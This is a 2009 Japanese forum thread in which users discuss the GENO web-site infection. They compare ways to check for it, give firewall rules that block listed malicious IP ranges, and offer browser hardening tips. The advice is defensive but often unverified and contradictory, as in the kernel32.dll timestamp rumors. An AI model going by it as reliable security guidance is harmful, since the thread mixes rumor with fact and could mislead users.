「ヘルプ」開いて「ファイアーウォール」か「ファイアウォール」をキーワード検索
「追加」とか「新規」みたいな項目を参照してみるといい
これでだいたい情報が出るはず
あとは
>>3のwikiで既出のノートンの設定方法を参考にしながら設定
見ればわかると思う
見てわからないなら、公式のアップデートを待つ方が安全
332 :
GENO:2009/05/17(日) 00:50:08 ID:yvGZdY1I0
>>274 6:うちのとインターフェースが違うくてやりかたがわからない
333 :
GENO:2009/05/17(日) 00:50:16 ID:uj1d73AxO
>>317 それもしかしたら「感染報告有りの『ジャンルの』女性向け個人サイト」じゃないか
334 :
GENO:2009/05/17(日) 00:50:31 ID:jd18fpllO
なんだ、またディアボロモンが出てきたか・・・
助けてオメガモン
腐女子叩きしてる奴ずっと同じだなw
336 :
GENO:2009/05/17(日) 00:51:14 ID:SJfmtU710
>>330 PCの電源を落として、外で元気よく遊ぶって対処はどう?
337 :
ゲノ:2009/05/17(日) 00:51:18 ID:rgSL3aLAO
理屈としては、2ヶ月くらいまったく更新してないサイトは
踏んでも感染の危険はないってことになるのか?
338 :
GENO:2009/05/17(日) 00:51:22 ID:xmW3/kkL0
ブログで注意喚起の記事かこうと思ってるんだけど上手くかけん
339 :
GENO:2009/05/17(日) 00:51:34 ID:Q4y83e6WO
勘違いさせて申し訳ないです
感染報告のあったジャンルで、まだ感染はしていない個人サイトの管理人です
自衛策についてって入れ忘れてました
本当すみません
もし感染してたらwikiやアドバイス通りOS再インスコしてみます
340 :
GENO:2009/05/17(日) 00:51:41 ID:S1fFX+c60
>>274 設定していて遅れたが、ありがd!
つか、流れはええw
341 :
GENO:2009/05/17(日) 00:51:59 ID:ELx2C7C+O
>>267 >>3 スレに向けて書けばよかた… ありがとうございます
通称をサブで残すのでいいのではと思います
たしかセキュ板で、GENOが作った訳ではない云々と見たんで心配になりました
342 :
GENO:2009/05/17(日) 00:52:10 ID:5sZH/fyG0
>>334 わろたw
しかし今回は2度目だからオメガモンじゃ太刀打ちできないな
343 :
GENO:2009/05/17(日) 00:52:17 ID:GhtL9Szf0
>>329 してる
でも注意書き置いてから50人くらい来て、読んでくれたの2人だけ
344 :
geno:2009/05/17(日) 00:52:19 ID:KFLP4Q6J0
>>327 おーMac情報ありがたい
bootcampでWin入れてるけど起動させてなかったら大丈夫なのかな
ClamXavもいれてるが、キャッシュを監視させたらいいのか…
345 :
GENO:2009/05/17(日) 00:53:01 ID:lOQh6FbQ0
>>338 ウイルスはやってるよーって軽く書くだけでも良いんじゃない
可能ならまとめサイトにリンク貼るとか
346 :
geno:2009/05/17(日) 00:53:09 ID:hqnP7TwX0
>>283,304
オンラインスキャンできないってのはソースチェッカーみたいにアクセス過多とは考えられんかね?
普段アンチウイルス入れないでオンラインスキャンやってるから大丈夫ってタコもいるわけだし。
過剰に騒いでる感もあるから今日はとりあえず寝るってのもありだよ。
回線と電源切って繋いで来る魔法使いなんかいないんだからさ。
347 :
geno:2009/05/17(日) 00:53:17 ID:kpbJMX3C0
>>1 >>309 うちのパソコン
sqlsodbc.chm以外に
kernel32.dllも書き換えられてるわ・・・orz
この二つだけ同じ3/21で同じ23:07分だわ
348 :
げの:2009/05/17(日) 00:53:32 ID:axZkSb/W0
>>3 まとめサイトの「よくある質問」の「携帯閲覧は平気?」の項目ですが、
あの書き方だとフルブラウザの携帯では感染するように読めてしまいます。
フルブラウザでも現状携帯は感染しないようですので、
『携帯電話でサイトを閲覧しても、現状では感染しない』
というように書き換えてくださるとありがたいです。
349 :
GENO:2009/05/17(日) 00:53:37 ID:gcrAZKPK0
>>329 字サイトで注意書き、まとめさいとにリンク済み。
はじめの方は注意書きすると「ねらーだったんですか」とかコメ送ってくるような輩もいたらしいけど
今はジャンルサーチやpixivでも注意書き広まってる
サイトでも注意書きすべき
350 :
ウィルス:2009/05/17(日) 00:53:47 ID:uCG8VfosO
ゲイの腐女子叩きは異常
351 :
geno:2009/05/17(日) 00:53:52 ID:rPGIPHzV0
>>329 してる
自分は弱小だけど、相互が大手だから相互にも伝えようと思ってる
352 :
GENO:2009/05/17(日) 00:54:23 ID:4W1dycX4O
携帯だとFTP自体使うこともないし
フルブラウザ使って万が一ウィルス感染したとしても
元々のウィルスの生体環境と合ってないから、結果感染はあってないようなもの
という解釈でおK?
ウィルスわかんねーよ難しーよ
353 :
geno:2009/05/17(日) 00:54:28 ID:0IVzoQFuO
そういや使ってないから確定情報ではないけど
フレッツウイルスクリアver4=バスター2009だから(ver3が2008)
そっちでも検疫できるんじゃないかと思う
v6と西のツールはわからん
これ、改ざんされるのってhtmlファイルだけ?
感染したらしいが、特にサイトのソースに変化なかったみたいだった
(全消し&パス替え&クリーンインスコはもうしましたorz)
うちのサイトは全部phpファイルだったんだが、
別にそんなこと関係ないよな……
そぼくな疑問というか、どうでもいい疑問ですまん
355 :
GENO:2009/05/17(日) 00:54:58 ID:kNIc/CiL0
>>337 違うんじゃないか?
2ヶ月更新して無くても、最近そのサイトの管理人がネサフやなんかでウイルスに感染したら
勝手にウイルスがサイトの更新…というか妙なもん埋め込むってことじゃないの?
356 :
geno:2009/05/17(日) 00:55:01 ID:/3OwKYN30
>>333 そういう意味か…わかりにくいなー
>>339 感染してないようだったら、サイトに注意喚起を早めに乗せるといいよ
357 :
GENO:2009/05/17(日) 00:55:02 ID:gcrAZKPK0
字→自でした
テンパってすまんね
358 :
GENO:2009/05/17(日) 00:55:29 ID:EfuA3f1a0
>>338 自サイトとPCが感染していない事を確認後
ブログに「関連スレ・まとめWikiからの抜粋です」って記事書いて
更に追記に、分かり易く平たくまとめたものを置いといた
特に閲からの反応はない
でも普段のホトは多い方なので、効果が少しでもあればいいと思ってる
359 :
geno:2009/05/17(日) 00:55:37 ID:kDSj2MIb0
>293
すまんかった
>299
Firefoxの初期設定ではぐぐった先のサイトを読み込む機能がある
そのサイトが感染してたら…
あのさ皆
書き込む前に
>>1から数レスぐらい頭に入れようよホント
360 :
GENO:2009/05/17(日) 00:55:44 ID:5igu3G/B0
ブログにウイルスのこと書いたら土曜だけでもアクセス凄いことになってたわ。
悲しいことに同ジャンルの人は見てくれてないこと。
記事かけない人はトラバ自由だから引用とかつかってもらってもいいんだけど、
アドレス晒すのあれだしなぁ。
361 :
GENO:2009/05/17(日) 00:56:06 ID:igdfzrf00
>>274 今設定完了したところだ
わかり易かった。ありがとう
362 :
げの:2009/05/17(日) 00:56:11 ID:+NzM6x/EO
>>329 3ホタだけど注意書きしてまとめのリンク貼った
363 :
GENO:2009/05/17(日) 00:56:17 ID:7o2dtJkl0
>337
その管理人が別サイトでFTP使ってたらアウトだろ
364 :
GENO:2009/05/17(日) 00:56:19 ID:A50YHmp70
365 :
geno:2009/05/17(日) 00:56:26 ID:M1q0FGmV0
まさにネット界のパンデミックだな
これって今までのウイルス騒動の中でもどれくらいのやばさに該当する?
DBか政治で例えてくれ
366 :
GENO:2009/05/17(日) 00:56:32 ID:xmW3/kkL0
レスどうも
簡単に書いておくことにするよありがとう
367 :
GENO:2009/05/17(日) 00:56:35 ID:iXwzbT0Q0
>>329 自分のPC&サイトにウイルス居ないって分かったけど怖くて更新できないから
日記に。見てくれる人がいるかどうかそれが問題。
368 :
geno:2009/05/17(日) 00:56:43 ID:wtX5212C0
>>329 簡潔にだけど目立つとこに喚起記事あげてきたけど
解析いれてないから、どのくらい需要あるかわからんな
mixiでも反応ない…やっぱ明日イベントだから、そっちに気が回ってるんだろうか
>>313 >>318 ありがとう
そういう事かなってのは思ったけど
他のスレでもグーグル検索の注意しかみなかったから
なんか問題でもあるのかと
370 :
GENO:2009/05/17(日) 00:56:49 ID:A2d6WHmP0
>>329 トップページで注意喚起した
付き合いのあるサイト管理人さんにも連絡した
すぐに呼応してブログやサイトトップに告知出してくれる管理人さんもいるし、
大げさだって言う管理人さんもいた
大げさだって笑われたっていいんだ
問題起きてからじゃ遅いんだから
371 :
GENO:2009/05/17(日) 00:57:17 ID:8hzwlEy90
まとめサイトのURLぶっこみスキャン、ブログのアドレス入れたら
ずっとStillなんたらって出る
混んでんのかなあ
ブログはほぼ感染しないって思ってていいんだろうか?
注意喚起文のせたいんだが、まずスキャンを、と思ったら時間かかって…
372 :
geno:2009/05/17(日) 00:57:39 ID:HhGbn2rD0
>>329 どピコだけどうちは書いてるよ。
今のところ読んでくれたのは1人だけだけど、IE8でのアクセスが増えてきた。
ジャンルサーチでも対応が速いところは注意書きがでてるけど、
そこや2ch見ない人もいるだろうから注意喚起のために書いた方がいいと思う。
できればまとめサイトへのリンクも載せるとよりよいかな。
373 :
3:2009/05/17(日) 00:57:55 ID:nbm7ZJwf0
>>321入れました
>>308 「個別」の95.129.145.58は追加しなくていいって解釈でいんだよね
大丈夫だろうけど一応修正しとくノシ
名称についてはとりあえず
>>267で様子見ということにします
意見あれば随時どうぞ
>>348今からやってきます
(345まで確認)
374 :
21:2009/05/17(日) 00:58:35 ID:kPCmhpdK0
>>320,340
おお、良かった。レス乞食みたいになって申し訳ないw
>>332 パケットフィルタ のような項目はないかい?
375 :
geno:2009/05/17(日) 00:59:09 ID:UQnEuMJQ0
>>329 昨夜からしてる
が、半数は2秒もせず目的コンテンツへ移動してる
登録してる幸管にもそれぞれメールしたんだけど何の反応もない
>>344 BootCamp使えないPPCユーザだから起動しない=おkかはわからん
とりあえずSentryでアプリケーション・ライブラリ・ダウンロードを全部監視させてるよ
376 :
GENO:2009/05/17(日) 00:59:18 ID:RRFJEuD+O
>>338 同じく
まとめサイトは100%安全かわかんねーし
だからと言って注意喚起文だけだとネット検索させることになるような気がする…
危ないよな?
びびりすぎか?
377 :
GENO:2009/05/17(日) 00:59:25 ID:U33DfpPQ0
>>365 見た目イメージで人造人間吸収したあとのセル
378 :
GENO:2009/05/17(日) 00:59:44 ID:0UGR+U7G0
今sqlsodbc.chmのファイルサイズ見てきたんだが
46,133バイトはアウト?他のcmd.exeとregedit.exeは起動したし
ニフティでも何も引っかからなかったんだが…
ぶっ飛んだこと聞いてたら申し訳ない
379 :
GENO:2009/05/17(日) 00:59:49 ID:3XFeCvnJO
>>355 phpでも書き換えられちゃうんじゃなかったっけ
380 :
GENO:2009/05/17(日) 00:59:49 ID:ipI1sAPh0
pixivに注意喚起画像上げたもんですが、
「企画目録タグつけてイメレス募集した方がいい」とアドバイスが
あったのでやってみました。参加してくださる方がいると
ウイルスに対する認知度上がるのでありがたいです。
381 :
GENO:2009/05/17(日) 00:59:59 ID:C9Hc9U/u0
382 :
geno:2009/05/17(日) 01:00:13 ID:Il+SPzcZO
383 :
GENO:2009/05/17(日) 01:00:26 ID:Dg7b04fU0
>>287 未確認情報を追加するのは感心しない。
「分かっている限りでは」と前置きし、
末尾に「詳しいことは解析中であるため、
他にも被害をもたらす動きをしている可能性もあります」
とするのが無難だと思う。
384 :
geno:2009/05/17(日) 01:00:38 ID:LoBLoCup0
>>337>>355 感染後に1度もFTPを使っての更新を行っていなければ、
IDとPASSが漏れないからページは感染しないと思われる
更新を行っていないという確証をどうやって得るのか疑問ではある
385 :
GENO:2009/05/17(日) 01:00:48 ID:/BtRfzOz0
>>352 感染するしないにFTPは関係ない
感染しない理由は、携帯にWindowsが入っていないから。
386 :
GENO:2009/05/17(日) 01:01:34 ID:XSgOllGY0
>>48とほぼ同じ状態なんだけど、firefox入れた直後に
adobeのサイト行ってflash入れた。
アドオンで見るとバージョンが10.0 r22と書かれてるんだがこれでいいのかな?
もし更新すべきならどうすればいいの?無効化と有効化しかボタンがない……
それから、ウイルスバスター2009のファイアーウォール設定で
IPを遮断する方法をご存知の方いませんか?
387 :
geno:2009/05/17(日) 01:01:46 ID:rgSL3aLAO
>355
>363
トン。理解できてきた。
別にサイトを持ってるということも大いに有り得るからな。
更新の有る無しに関わらずソース確認必須か
388 :
GENO:2009/05/17(日) 01:01:58 ID:Oq4bXr9IO
ニューソクにスレたってなかっか?
+じゃないけど
389 :
GENO:2009/05/17(日) 01:02:01 ID:95S+IsNN0
需要有る無しというより、どっか間違ってないか確認お願いしたいので、バスターでのFW設定書いておく。
前スレノートン先生設定参照&引用改造
■ウイルスバスター2009(ver.17.1.1251)のファイアウォール設定
1.メイン画面→「パーソナルファイアウォール」クリック
2.「設定」クリック→開いたウィンドウ内の「詳細設定」クリック
3.「プロファイルの詳細設定」ウィンドウの「例外ルール(プロトコル)」タブをクリック
4.「追加」→「新規例外ルール(パーソナルファイアウォールネットワーク)」ウィンドウが開くので以下設定※
5.「OK」をクリックして開いているウィンドウを閉じ、最後にメイン画面を閉じる
※例外ルール設定について(IPの記述方法)
例1)【94.247.2.0 - 94.247.3.255】の場合
「説明」→例外ルール名を入力
「方向」→受信(送信でも同じ設定を作る)
「処理」→遮断
「プロトコル」→すべて
「ポート」→すべてのポート
「タイプ」→指定範囲のIPアドレス(IPv4)
→開始アドレスに「94.247.2.0」
→終了アドレスに「94.247.3.255」を入力
「OK]をクリック後、ルール名を変えて「方向:送信」で同様の設定を作成する
例2)【78.109.29.112】の場合(基本↑と同じ)
「タイプ」→IPアドレス(IPv4)
→ホスト名:空欄
→IPアドレスに「78.109.29.112」を入力
こんな感じであってる?
IPv6とかが正直ワカンネ
390 :
g:2009/05/17(日) 01:02:15 ID:jpopUHeK0
FTPのパスを変える
買い物とかした所のパスを変える
こえをしようとおもったら自分の環境だと一度ログインして
変更しないとダメなんだけど、リカバリした後だとログインしても
大丈夫なんだよね?ウイルス消えてる(はず)だから・・・
391 :
GENO:2009/05/17(日) 01:02:15 ID:8M+K/x8d0
ところでjugemとかFC2のレンタルブログはダイジョウブなのか?
やばいって言ってる人が居たりして混乱してきた
392 :
geno:2009/05/17(日) 01:02:19 ID:dE8HKbzcO
>>368 流れこんなに早いのに書いてるやつは大体一緒ってことか
393 :
新参:2009/05/17(日) 01:02:36 ID:afmNfvO0P
>>365 ドラゴンボールを敵に7つ全部回収されてるぐらいやばい
>>370 どこかのニュースで見たけど、日本人って大災害・大震災の時
パニックになるよりも「大丈夫だろう」と事態を甘く見て
危険に陥ることの方が多いらしい
394 :
GENO:2009/05/17(日) 01:02:45 ID:iqYagjBU0
>>347 うちもアウトかな・・・
同じようにkernel32.dllが3/21の23:07:24に更新されてる
sqlsodbc.chmは普通に2004年だ
カスペオンラインも出来ないので体験版落としてみる
395 :
GENO:2009/05/17(日) 01:02:46 ID:k/dYf2fw0
>>373 >「個別」の95.129.145.58は追加しなくていいって解釈
そうですそうです。
どの道、wikiに書かれた順番通りに打ち込んでいけば
このアドレスはノートン先生に注意されて追加できません。
396 :
geno:2009/05/17(日) 01:03:12 ID:iPJ/ImKb0
うはwwwwwwwヤンキードゥードゥルウイルスに感染してたw
397 :
geno:2009/05/17(日) 01:03:38 ID:qaO95sGbO
最大幸が注意書きしてくれて良かった
まだ感染してないが今使ってないPCサイトは削除、携帯サイトは暫くはPCアク禁、更新は携帯にすべきだよな
注意書きつけて
398 :
geno:2009/05/17(日) 01:04:14 ID:GytLXJEE0
>>389 0.0.0.0-255.255.255.255はIPv4アドレス
IPアドレス足りなくなってきたからもっと増やそうぜ!っていうとでできたのがIPv6アドレス
v6は16進数で表記
399 :
GENO:2009/05/17(日) 01:04:15 ID:SJfmtU710
kernel32.dll のMD5を調べてみようよ
400 :
389:2009/05/17(日) 01:04:16 ID:95S+IsNN0
ごめん書き忘れてた
バスター設定についてはサポート参照
tp://esupport.trendmicro.co.jp/Pages/JP-2063926.aspx
401 :
GENO:2009/05/17(日) 01:04:25 ID:nHdsO1GP0
とりあえず確認事項は全部クリアして、ニフティのスキャンでも問題なしだったのだが
じゃあ今月始めごろからのメモリの異常消費&IE激重ですぐ固まる問題は
何が原因だったんだろう。やっぱり感染してるんじゃないかと怖い。
402 :
GENO:2009/05/17(日) 01:04:26 ID:RavOyUZr0
403 :
GENO:2009/05/17(日) 01:04:35 ID:lOQh6FbQ0
3月21日に書き換えられてるって報告が多いね
ただの偽装なのかその辺でばら撒かれたのか
404 :
geno:2009/05/17(日) 01:04:41 ID:LoBLoCup0
>>371 FTPを使わず、WEBブラウザからのみ更新するブログなら、
仮に更新する人のパソコンが感染しててもブログが感染することはない
と思われる
405 :
GENO:2009/05/17(日) 01:04:46 ID:wsFKGO1y0
>327訂正加筆
10.3までのOSユーザーはFlash Playerを外す
Acrobat ReaderおよびPDFの拡張子割り当て機能を外す
Safari・OmniWebなどWebKitベースブラウザユーザーは「ダウンロードしたファイルを開く」を
オフにすること(Safariの「全般」で設定できるが見落とされてしまうことが多い)
Safariの「開発」でJavaScriptをオフにした場合でも、設定→セキュリティ→「JavaScriptを
有効にする」および「プラグインを有効にする」も切っておくこと。
Webブラウザ内閲覧機能を切るかJavaScriptオフにする
406 :
geno:2009/05/17(日) 01:04:51 ID:1aBsreVw0
>>386 火狐入れたらツール→アドオン→アドオンを追加
で、とりあえず「NoScript」入れとけ
408 :
GENO:2009/05/17(日) 01:05:18 ID:k5Es+N2e0
ベリーナイスジャンキーのことかと思った
409 :
GENO:2009/05/17(日) 01:05:30 ID:onHfnISQ0
>>401 症状がこのウィルスのに似てるね
一応今後も注意されたし
410 :
geno:2009/05/17(日) 01:05:39 ID:hqnP7TwX0
411 :
GENO:2009/05/17(日) 01:05:52 ID:d2XBlzrV0
ブラウザのJavaScript切ってたら
ヤフメが中に入れてくれないorz
なんかscript使ってたっけあそこ
いちいちヤフメ開くときだけオンにするのうぜー
412 :
GENO:2009/05/17(日) 01:05:59 ID:4W1dycX4O
>>385 ようするに人間がインフルエンザでわーわーいってる間、
地球に潜伏してる宇宙人は体の内部構造が違うから風邪すらひかないってことか
ただウィルスが宇宙人にあわせて変化する可能性はあるから注意だけはしろよと
という解釈であってる?
413 :
げの:2009/05/17(日) 01:05:59 ID:+NzM6x/EO
>>391 じゅげむは知らん
FC2はちょっと運営がグダグダなとこがあるし、前科があるから警戒したほうがいいと個人的には思う
414 :
GENO:2009/05/17(日) 01:06:04 ID:Ee2VdHkT0
>>407 アドオン追加しなくてもJS切っとけばOKのはず
415 :
GENO:2009/05/17(日) 01:06:07 ID:5sZH/fyG0
>>394 こっちもカーネル32同じ時間に更新されてるな
416 :
geno:2009/05/17(日) 01:06:08 ID:oh3SbsZKO
Yahooトップページは大丈夫だよね?
417 :
GENO:2009/05/17(日) 01:06:09 ID:tznnOLLq0
>>359 前前スレで先読み検索されてキャッシュされても実際に開かん事には
問題ないとあったんだけどやっぱりダメだったって事?
418 :
geno:2009/05/17(日) 01:06:10 ID:mTkl1Ypu0
kernel32.dllが2009年3月21日23:18:57になってるんだがアウトか?
サイト消してくるか
419 :
GENO:2009/05/17(日) 01:06:16 ID:txLmXpE00
ソースに埋め込まれるスクリプトって全ページ一律に埋め込まれるんだろうか
自分のPCは感染していないけど念には念を、と思って自サイトのソースを見だしたんだが
ファイル数が多くて挫折した_| ̄|○
今んとこアウトだったらトップから丸ごとアウトな報告ばかりだよな?
420 :
geno:2009/05/17(日) 01:06:21 ID:/3OwKYN30
>>393 パニックにならず冷静になったほうがいい、とはよく言われるが、
実際はパニックになった方がいいらしいぜ
421 :
GENO:2009/05/17(日) 01:07:44 ID:onHfnISQ0
422 :
GENO:2009/05/17(日) 01:07:48 ID:Oq4bXr9IO
そろそろ散々馬鹿にしてくれたピクシブスレの奴らが乗り込んでくるなあ…
423 :
GENO:2009/05/17(日) 01:08:24 ID:C9Hc9U/u0
424 :
GENO:2009/05/17(日) 01:09:14 ID:Co0JIJet0
>>364 仲間がいてなんだかほっとしたw
あれってどうなんだろうね。ちゃんと報告してくれるんだろうか。
今のところ何も言ってこない…(あまりネサフしてない、というのもあるのかもだけど)
今、サイトにウィルスに対する注意とまとめへのリンク貼ってきた。
しっかしjs切ると不便だな。やほーメールも使えない。読むことは出来るんだが
アドレスブックが表示されない…
425 :
GEの:2009/05/17(日) 01:09:26 ID:ISsFcxkw0
サーパラあたり注意喚起してほしい
426 :
GENO:2009/05/17(日) 01:10:10 ID:Dg7b04fU0
>>373 更新乙
携帯の件に限らずなんだけど、
タイムスタンプは「現状(09/05/17 0時現在)」とかにした方がいい。
結構な早さで感染・亜種発生してる印象を受けるし、
それ以前に分かってないことも多いから
いつ時点の情報なのか明確にしておいた方が安心感が出る。
427 :
GENO:2009/05/17(日) 01:10:34 ID:ndSlYXowP
kernel32.dllが2009年3月21日、23:07:24
この予感・・・セーフ!
428 :
GENO:2009/05/17(日) 01:10:52 ID:hI/uAa4T0
×WindowsUpdate
○PDFリーダーを最新にする (AdobeReader や Foxit Reader)
×AdobeFlashを最新にする
×94.247.2.195(94.247.[2-3].[0-255])への接続を遮断
○Adobe ReaderとブラウザのJavascriptを切る
○貼られている怪しいリンクをむやみに開かない
○ウイルス定義ファイルを更新する
とりあえずわかる所だけ実行しました
×の部分はよくわからなくて放置です
○の部分だけでも感染はある程度ふせげますか?
>>412 どっちかというと、豚のインフルエンザが人間にかかるはずないだろwww
って状態
現状じゃPCウィルスは自分で変化できないんで現実みたいな事にはならない
430 :
geno:2009/05/17(日) 01:11:11 ID:8M+K/x8d0
>>413 自分ブログサイトでジュゲムメインで使ってるからどうすべきか悩む
憂鬱だ
431 :
GENO:2009/05/17(日) 01:11:28 ID:5RSVn9DW0
>401
自分も。なんも出てこなかったし、サイトも平気だし今のところ何もないけど、
今月入って少し重たくなったのが恐い。気をつけてよう…
432 :
GENO:2009/05/17(日) 01:11:38 ID:sZeodPf30
サイト持ってない手ブロユーザーだけど自ジャンルタグで注意喚起したけど効果あるかな
433 :
geno:2009/05/17(日) 01:11:44 ID:Lgdg/CN90
>kernel32.dllが2009年3月21日
どういう流れでそのファイルが日付更新されてたらアウトってことになったんだ
434 :
新参:2009/05/17(日) 01:11:46 ID:afmNfvO0P
>>424 Opera使って、YahooメールだけJavaScript有効にすればいいよ!
とだけ書き込もうとしたが
よく考えるとYahooメールが感染しないという確証もないんだよな
435 :
GENO:2009/05/17(日) 01:11:53 ID:J2f6QJAe0
自分もkernel32.dllの更新が2009年3月21日、23:07:24になってる
アウアウ判定はまだ早いんじゃね
kernel32.dllが?2009?年?2?月?13?日、??17:49:05
これマズいんかな
437 :
GENO:2009/05/17(日) 01:12:30 ID:RavOyUZr0
君ら疑心暗鬼になりすぎ
釣りに引っ掛かるぞ
438 :
GENO:2009/05/17(日) 01:12:32 ID:EfuA3f1a0
ん?なんで日付だけでアウセフ言ってんの?
自分スレ全部見てる暇人だけど
サイズが普通だったらセフ、大きければアウトでFA出てんじゃないの?
439 :
GENO:2009/05/17(日) 01:12:34 ID:4Z+FrIEGO
すみません質問なんですが、WindowsXP使っており、まとめサイトの感染確認(感染してなかったです)と
感染前の対策を実践したあと、ネットに接続はできるけどIEでどこのページも表示されない上に、
OEでメールの送受信もできなくなりました
ちなみに他のブラウザやメールソフトは入っていません。
何か考えられる原因はありますか?
440 :
348:2009/05/17(日) 01:12:48 ID:axZkSb/W0
>>3 書き換えありがとうございました
素早い対処お疲れ様です
441 :
GENO:2009/05/17(日) 01:13:11 ID:4W1dycX4O
>>429 おK、把握できた!
わかりやすい説明をありがとうございます
442 :
GENO:2009/05/17(日) 01:13:14 ID:sYclzj/p0
443 :
geno:2009/05/17(日) 01:13:14 ID:KFLP4Q6J0
夕方のgoogle急上昇ワードに
GENOウィルスが6位にはいってたんだが
なくなったな…
ところで、色んな設定方法とか書かれたり転載されてるけど、
ほんとうにこれって正しいっていえるのかな?
それっぽい書き方されると、鵜呑みにしてしまうけども
危険かなーとも思う
もちろん、教えてもらえるのは嬉しいんだけど
444 :
geno:2009/05/17(日) 01:13:15 ID:GytLXJEE0
>>439 どう考えてもFWの設定をミスっています本当にあ(ry
445 :
3:2009/05/17(日) 01:13:33 ID:nbm7ZJwf0
>>327>>405あたりのMacの話だが
「とりあえず感染してるか確認する手順(Mac)」もしくは
「Macユーザー向け」でページを作りたい
マカーさん、そのままコピペすればおk的なテンプレたのむ
>>383ちょい考えるわ
(383まで確認)
446 :
GENO:2009/05/17(日) 01:13:43 ID:YwfjCeYW0
kernel32は普通のwindowsupdateのような気がしてきた
447 :
GENO:2009/05/17(日) 01:13:56 ID:5sZH/fyG0
セフなのかアウのかどっちなんだw
448 :
GENO:2009/05/17(日) 01:14:06 ID:wsFKGO1y0
Yahoo!メール使ってる人はPOP3受信サービスをつかってみたら?
受信サーバの名前 pop.mai.yahoo.co.jp
ユーザー名 メールアドレス@の左側、つまりユーザーアカウント
受信サーバのポート番号 110
APOPを使用 しない
SSLを使用 しない
受信したメールをサーバから削除 しない
送信設定は
smtp.mai.yahoo.co.jp
POP before SMTP する
SMTP認証 しない
パスワード 自分で定義したパス
449 :
GENO:2009/05/17(日) 01:14:35 ID:J2f6QJAe0
421の釣りかよ
勘弁しろ
450 :
GENO:2009/05/17(日) 01:14:50 ID:Eqx9T9080
ちょ、kernel32.dllについてkwsk
更新が同じく3/21なんだが…
451 :
GENO:2009/05/17(日) 01:14:50 ID:IigO4d0WO
>>427 まったく一緒
普通のアップデートであってほしい
弾くIPアドレスリストがまとめサイトとかここに掲載されてるけど
元情報はどこからなの?
453 :
GENO:2009/05/17(日) 01:15:29 ID:SJfmtU710
ファイルの正しい、正しくないはタイムスタンプだけ見てても無意味。
MD5をチェックして、それで判断をすべき。
MD5をチェックしたら、複数人でつき合わせて判断するといい。
時間だけ気にしてても、何の解決にもならないよ。
kernel32.dllで不安になってる人は、MD5をチェックするんだ。
チェックするソフトがない人は、これとかどうかな。
ElleFileInfo
ttp://www.elletime.net/freeware.html
>>428 AdobeFlashは最新にしないとダメ。
>>100 あたりを参考にしてみなされ。分からなかったら素直にネット止めるべし。
455 :
geno:2009/05/17(日) 01:16:42 ID:ZlOuERst0
感染時の対策方法を具体的に
おしえて
456 :
g:2009/05/17(日) 01:16:57 ID:jpopUHeK0
kernel32.dll2009年3月21日、23:07:24
まったく同じです
457 :
GENO:2009/05/17(日) 01:17:13 ID:ndSlYXowP
クリーンインスコ
458 :
GENO:2009/05/17(日) 01:17:17 ID:z1fSRVRF0
>>418が気になってkernel32.dll調べたら更新日時が2009年3月21日23:18:57で同じだった
sqlsodbc.chm、cmd.exe、regedit.exeは正常
ニフティスキャンも異常なしだけど感染?亜種ってことでいいのかな
459 :
GENO:2009/05/17(日) 01:17:21 ID:8hzwlEy90
>>404 ありがとう
FTP使わないタイプだし(忍者ブログなんだけど、これそうだよね)
ソースにも自パソにも特に異常はないみたいなんで注意文のせてくる
>>411 ホットメールも開かない
めんどい
460 :
GENO:2009/05/17(日) 01:18:20 ID:Dg7b04fU0
感染してるかどうか分からなかったら、
>>13に挙げたサイト使って調べてみるのもあり。
たとえばkernel32.dllが疑わしいと感じた場合なら、
これをサイトでスキャンかけられる。
http://www.virustotal.com/jp/ Virustotal は 疑わしいファイルを解析するサービスであり、
ウイルス、ワーム、トロイの木馬およびアンチウイルスエンジンにより
検出される全てのマルウェアを素早く簡単に検出します。
461 :
geno:2009/05/17(日) 01:18:46 ID:hqnP7TwX0
462 :
GENO:2009/05/17(日) 01:18:47 ID:lOQh6FbQ0
感染した人はブルースクリーンで起動した?
これは絶対に起こることでもないのか
463 :
GENO:2009/05/17(日) 01:18:57 ID:SJfmtU710
>>455 回線切ってフォーマットしてOS再インスコ
>>459 windows live mailのクライアント導入オヌヌメ
464 :
GENO:2009/05/17(日) 01:19:30 ID:+Ile/hUn0
ノートンで特に反応しないのにカスペで真っ赤になる件
確認しなおしたら
Application Data\Symantec\Norton AntiVirus\
ノートンかよ…まったくおまえときたら…
465 :
GENO:2009/05/17(日) 01:19:51 ID:kP1tdjseO
サイトの目立つところに警告文載せたがみんな見てくれてんだろうか・・・
幸と大手サイトが動いてくれればなあ
軒並みウィルスには触れずに普通に更新してっから心配だわ
ちなみにパソからじゃ怖いので携帯で巡回してる
466 :
GENO:2009/05/17(日) 01:20:02 ID:WVTbay1AO
421は釣りか日にちで判断した勘違いかと思われる
467 :
geno:2009/05/17(日) 01:20:02 ID:SpyBZ6AtO
自パソが感染してたんだけど、自サイトは感染してなかった
この場合、下手に削除するより、そのままサイト放置でいいのかな?
ちょっと時間取れなくて、クリーンインストールは週明けになりそうなんだ
468 :
GENO:2009/05/17(日) 01:20:11 ID:rn3zMKpE0
質問させてください。
マイパソコン(FTPアップロード元)が感染していなければ
マイサイトも感染しないという認識で合っていますか?
サイトトップのソース見てみたら、何のためにあるのかよく分からない
長いJAVAスクリプトがあるので怖くなってきました。
パソコン自体はmacなので、まだ感染してないと思うんですが。
469 :
geno:2009/05/17(日) 01:20:23 ID:kpbJMX3C0
kernel32.dllはガセ情報。
さすがにそれに感染したら大騒ぎになる。
471 :
geno:2009/05/17(日) 01:21:29 ID:Lgdg/CN90
>>468 どうして自分のサイトなのによくわからないんだ!アホか!
自動挿入の広告か、自分で訳も解らず入れたアクセス解析タグか、ウィルスだよ!
472 :
GENO:2009/05/17(日) 01:21:33 ID:SJfmtU710
>>469 だから、タイムスタンプでものを語るなって。
せめて、MD5で判断しよう。
473 :
GENO:2009/05/17(日) 01:21:47 ID:VX7Lo5H7P
474 :
geno:2009/05/17(日) 01:21:52 ID:s+rgNGWb0
kernel32.dllはupdateじゃないか
ほぼ同時刻に更新されてるファイルを調べたらwindows updateだったよ
475 :
geno:2009/05/17(日) 01:21:55 ID:kpbJMX3C0
476 :
GENO:2009/05/17(日) 01:22:11 ID:OMRGA0Ne0
>>467 削除しようとFTP繋げた瞬間アウトになるからそのまま
またはクリーン後にサイト全部削除してやり直すのがいいんじゃないか
477 :
GENO:2009/05/17(日) 01:22:13 ID:iqYagjBU0
すまん最初にkernel32.dllの話だしてしまって
kernel32.dllが今日入れたavastウィルスのチェストに隔離されて
詳細は「ウィルスなし」って出るんだけど更新日が3/21だったから気になっただけなんだ
最初に出ていたsqlsodbc.chmが改ざんされた場合が3/21だったから。
updateならいいな
478 :
